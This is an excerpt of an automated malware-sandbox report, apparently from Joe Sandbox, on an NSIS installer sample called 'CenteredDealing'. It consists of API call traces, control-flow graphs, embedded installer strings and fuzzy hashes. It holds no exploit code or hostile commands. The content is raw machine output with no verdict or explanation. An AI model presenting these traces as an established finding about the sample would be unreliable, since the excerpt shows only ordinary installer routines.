                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow EndDialog 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 
122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                • String ID: @rD
                                                                                                                                                                                                                                                                • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 
ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                • API String ID: 2872004960-3619442763

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(9732,?,?,?,9732,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,9732,?,?,?,9732,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(9732), ref: 00405A4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$9732$@rD$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 608394941-1343473643

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,TemperatureHighHunterTrash,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,TemperatureHighHunterTrash,TemperatureHighHunterTrash,00000000,00000000,TemperatureHighHunterTrash,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TemperatureHighHunterTrash
                                                                                                                                                                                                                                                                • API String ID: 4286501637-4146098718
                                                                                                                                                                                                                                                                • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                                                                                • API String ID: 651206458-1535804072

                                                                                                                                                                                                                                                                Control-flow Graph

